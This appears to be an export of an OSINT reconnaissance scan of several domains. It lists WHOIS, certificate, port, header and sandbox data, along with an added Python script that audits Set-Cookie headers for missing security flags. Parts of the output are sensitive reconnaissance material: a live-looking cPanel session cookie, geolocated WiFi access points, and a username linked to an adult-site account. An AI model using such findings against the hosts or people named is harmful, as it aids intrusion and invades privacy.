Tech Email: https://www.name.com/contact-domain-whois/007316.xyz/tech
Name Server: ns2knz.name.com
Name Server: ns4blx.name.com
Name Server: ns3cna.name.com
Name Server: ns1cnb.name.com
DNSSEC: unSigned
Registrar Abuse Contact Email: abuse@name.com
Registrar Abuse Contact Phone: +1.7203101849
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:09:26Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
| 007316.xyz |
| 2023-05-12 03:01:34 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.101): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:33:45 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | http://ns.adobe.com/xap/1.0/
XPhotoshop 3.0
Photo Booth
ICC_PROFILE
mntrRGB XYZ
acspAPPL
| https://pics.battleb0t.xyz/images/jcqn.jpg |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Pillowfort (Category: social); https://www.pillowfort.social/login | login |
| 2023-05-12 02:45:32 | Malicious IP Address | Yes | PhishStats | 0 | 1 | 2 | 0 | None | Phishstats [185.199.108.153] | 185.199.108.153 |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Pornhub Users (Category: XXXPORNXXX); https://www.pornhub.com/users/Altpapier | Altpapier |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | BriteMedia (Net ID: 00:00:72:20:59:DD) | 41.8781, -87.6298 |
| 2023-05-12 02:44:09 | Co-Hosted Site | No | SSL Certificate Analyzer | 4 | 1 | 1 | 0 | None | www.github.com | battleb0t.xyz |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | FruityWifi-001 (Net ID: 00:02:72:8E:62:D1) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:01:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.248): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | MatrixEx BYOD (Net ID: 00:01:21:26:42:51) | 41.8781, -87.6298 |
| 2023-05-12 02:46:50 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
02:5a:61:0f:58:eb:84:f1:ad:53:ae:03:dc:a9:84:7a
Signature Algorithm: ecdsa-with-SHA384
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS Hybrid ECC SHA384 2020 CA1
Validity
Not Before: Dec 21 00:00:00 2022 GMT
Not After : Jan 21 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=Netlify, Inc, CN=*.netlify.app
Subject Public Key Info:
Public Key Algorithm: id-ecPublicKey
Public-Key: (256 bit)
pub:
ASN1 OID: prime256v1
NIST CURVE: P-256
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:0A:BC:08:29:17:8C:A5:39:6D:7A:0E:CE:33:C7:2E:B3:ED:FB:C3:7A
X509v3 Subject Key Identifier:
3E:6A:BE:6E:25:AC:12:10:AB:BE:F1:EB:A7:A9:BC:6D:88:7D:54:8F
X509v3 Subject Alternative Name:
DNS:*.netlify.app, DNS:netlify.app
X509v3 Key Usage: critical
Digital Signature
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Dec 21 09:03:52.902 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Dec 21 09:03:52.857 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 3B:53:77:75:3E:2D:B9:80:4E:8B:30:5B:06:FE:40:3B:
67:D8:4F:C3:F4:C7:BD:00:0D:2D:72:6F:E1:FA:D4:17
Timestamp : Dec 21 09:03:52.852 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: ecdsa-with-SHA384
| 34.148.97.127 |
| 2023-05-12 02:54:38 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 172.67.168.252:8443 | 172.67.168.252 |
| 2023-05-12 02:50:11 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://www.rotaryragusa.it/', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"cdnjs.cloudflare.com"\n "rotaryragusa.it"\n "www.rotaryragusa.it"'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_d28_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "IsoScope_d28_IESQMMUTEX_0_331"\n "IsoScope_d28_ConnHashTable<3368>_HashTable_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "IsoScope_d28_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_d28_IE_EarlyTabStart_0x910_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_d28_IESQMMUTEX_0_303"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3368"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n 
"\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar4950.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.rotaryragusa.it" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nConnection: Keep-Alive\nHost: www.rotaryragusa.it" (Indicator: "user-agent: ")\n "GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-includes/css/dist/block-library/style.min.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: 
Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: rotaryragusa.it\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET / HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nDNT: 1\nHost: rotaryragusa.it\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-includes/css/classic-themes.min.css?ver=1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/themes/rotary/js/libs/gumby.min.js?ver=6.1.1 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/rotary/js/libs/gumby.min.js?ver=6.1.1 HTTP/1.1\nAccept: application/javascript, 
*/*;q=0.8\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/themes/rotary/css/style.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/rotary/css/style.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.3 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.3 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/themes/rotary/style.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like 
Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/rotary/style.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/themes/rotary/js/main.js?ver=6.1.1 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/rotary/js/main.js?ver=6.1.1 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/themes/rotary/js/jquery/jquery.hoverIntent.js?ver=6.1.1 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "mozilla/5.0 (")\n "GET /wp-content/themes/rotary/js/jquery/jquery.hoverIntent.js?ver=6.1.1 HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 
1\nConnection: Keep-Alive\nCookie: pll_language=it" (Indicator: "user-agent: ")\n "GET /wp-content/themes/rotary/css/bootstrap-image-gallery.css?ver=6.1.1 HTTP/1.1\nAccept: text/css, */*\nReferer: https://rotaryragusa.it/\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: rotaryragusa.it\nDNT: 1\nConnection: Keep-Alive\nCookie: | 185.199.110.153 |
| 2023-05-12 02:54:13 | Linked URL - Internal | No | Web Spider | 0 | 0 | 1 | 0 | None | http://ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:00:36 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | abusecomplaints@markmonitor.com | Domain Name: GITHUB.COM
Registry Domain ID: 1264983250_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2022-09-07T09:10:44Z
Creation Date: 2007-10-09T18:20:50Z
Registry Expiry Date: 2024-10-09T18:20:50Z
Registrar: MarkMonitor Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email: abusecomplaints@markmonitor.com
Registrar Abuse Contact Phone: +1.2086851750
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: DNS1.P08.NSONE.NET
Name Server: DNS2.P08.NSONE.NET
Name Server: DNS3.P08.NSONE.NET
Name Server: DNS4.P08.NSONE.NET
Name Server: NS-1283.AWSDNS-32.ORG
Name Server: NS-1707.AWSDNS-21.CO.UK
Name Server: NS-421.AWSDNS-52.COM
Name Server: NS-520.AWSDNS-01.NET
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T02:59:31Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
|
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-embedder-policy: require-corp | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=u1lyJPU0WioZJ7gW30pw%2F1QYGnEvSi6VguD4iZQLy9JFxNjUYX7Kn2AvbK1RwFeWf6Bc3GtzenDe9QfSS82xeo%2BaVIIeURcDQSNP2UoyOSj%2Fo0e2kf0IgvowllGBeio%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60715ea2423d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Content_Type": "DISPLAY_UTF8", "Set_Cookie": "DISPLAY_UTF8", "X_Content_Type_Options": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Pragma": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Content_Type": ["text/html; charset=\"utf-8\""], "Set_Cookie": ["whostmgrrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "whostmgrsession=%3a6IuBt4aiK1K5mEWt%2ce37772b57ce45a47eb222a7bbd7feb28; HttpOnly; path=/; port=2086", "roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2086", "PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086", "imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086"], "X_Content_Type_Options": ["nosniff"], "Connection": ["close"], "Pragma": ["no-cache"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["no-cache, no-store, must-revalidate, private", "no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
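The Censys row above is a cPanel/WHM (port 2086) response that sets one live session cookie and a batch of expired "clearing" cookies. A practitioner reading it wants to know which of these actually carry a session and whether those are hardened. The following is an added example, not SpiderFoot or Censys code: it parses a list of Set-Cookie values, skips deletion cookies (Max-Age<=0 or an Expires date at or before the scan time), and reports missing Secure/HttpOnly/SameSite and non-RFC 6265 attributes such as `port`. The sample input is copied from the row; `SCAN_TIME` is the row's Date Found, and the `over_tls=True` call is an assumption made so the Secure check is exercised.

```python
"""Audit captured Set-Cookie headers for missing hardening attributes."""
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed sample: Set-Cookie values from the cPanel banner on 87.248.157.102:2086
# in the scan row above, copied here so the check runs offline.
SAMPLE_SET_COOKIE = [
    "whostmgrrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086",
    "whostmgrsession=%3a6IuBt4aiK1K5mEWt%2ce37772b57ce45a47eb222a7bbd7feb28; HttpOnly; path=/; port=2086",
    "roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2086",
    "Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2086",
]
SCAN_TIME = datetime(2023, 5, 12, tzinfo=timezone.utc)  # the row's Date Found (assumed reference time)
STANDARD_ATTRS = {"expires", "max-age", "domain", "path", "secure", "httponly", "samesite"}


def parse_set_cookie(header):
    """Split one Set-Cookie value into (name, value, {attr: value}); attribute names lower-cased."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def is_deletion(attrs, now=SCAN_TIME):
    """True when the header only clears a cookie (Max-Age<=0, or Expires at/before `now`)."""
    if "max-age" in attrs:
        try:
            return int(attrs["max-age"]) <= 0
        except ValueError:
            return False
    if "expires" in attrs:
        try:
            # parsedate_to_datetime accepts the RFC 850 "01-Jan-1970" form cPanel emits
            return parsedate_to_datetime(attrs["expires"]) <= now
        except (TypeError, ValueError):
            return False
    return False


def audit_cookies(headers, over_tls, now=SCAN_TIME):
    """Return {cookie_name: [findings]} for cookies that are actually being set."""
    report = {}
    for header in headers:
        name, _, attrs = parse_set_cookie(header)
        if is_deletion(attrs, now):
            continue  # a clearing cookie carries no session, so its flags do not matter
        findings = []
        if over_tls and "secure" not in attrs:
            findings.append("missing Secure: cookie would also be sent over cleartext HTTP")
        if "httponly" not in attrs:
            findings.append("missing HttpOnly: readable from script")
        if "samesite" not in attrs:
            findings.append("missing SameSite: relies on the browser default")
        for key in sorted(attrs.keys() - STANDARD_ATTRS):
            findings.append(f"non-standard attribute {key!r}: not an RFC 6265 attribute, browsers ignore it")
        if findings:
            report[name] = findings
    return report


if __name__ == "__main__":
    for cookie, findings in audit_cookies(SAMPLE_SET_COOKIE, over_tls=True).items():
        print(cookie)
        for f in findings:
            print("  -", f)
```

Only `whostmgrsession` survives the deletion filter; the expired Roundcube and Horde cookies are noise from the panel clearing old sessions and would otherwise swamp the report.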
| 2023-05-12 02:44:09 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 1 | 0 | 1 | 0 | None | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io | battleb0t.xyz |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | denis (Net ID: 00:01:46:02:C4:4C) | 37.7813933,-122.3918002 |
| 2023-05-12 02:45:35 | Internet Name | No | DNSDumpster | 0 | 0 | 1 | 0 | None | nwapi.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-ray: 7c5f6036feab195d-EWR | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:07:25 | Vulnerability - CVE Low | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-0169
https://nvd.nist.gov/vuln/detail/CVE-2013-0169
Score: 2.6
Description: The TLS protocol 1.1 and 1.2 and the DTLS protocol 1.0 and 1.2, as used in OpenSSL, OpenJDK, PolarSSL, and other products, do not properly consider timing side-channel attacks on a MAC check requirement during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, aka the "Lucky Thirteen" issue. | 185.199.110.153 |
| 2023-05-12 03:08:53 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 34.74.170.64 | 34.74.170.74 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2087 | 104.21.71.14 |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [003marek.github.io]
https://www.openphish.com/feed.txt | 003marek.github.io |
| 2023-05-12 03:33:51 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | PLTE$
kyhNlC2D
kShPAJ
esyS_S@?
txkST`ANdNO
rXYuPYXHR
XajGc
dzvRt
IDATx
:7MV-
'@crrX
QK>@W
vWP`Z
tmv1q
XEFi"
4@1hb
a'c:3
2FRB>
LHiiB
YFI6D
.f:9Lsy
PDad6
k67iB
'phZQ
_tJ/o8
qgd0 f
D3f1c
-\-u?V
\e<<N
X?YJa
IDAT<mJ
ISE>E
>O$-'
H T:1
g !A"B
Ff<3Bz\
TQHocI
Dp//>
<U'Xk
V M55j
\T:x
u>6N9z@
IDATB
zt28zQ
NL3:\m
l?:6
_ycqP
t1nT_
o !ABH
FbaS\
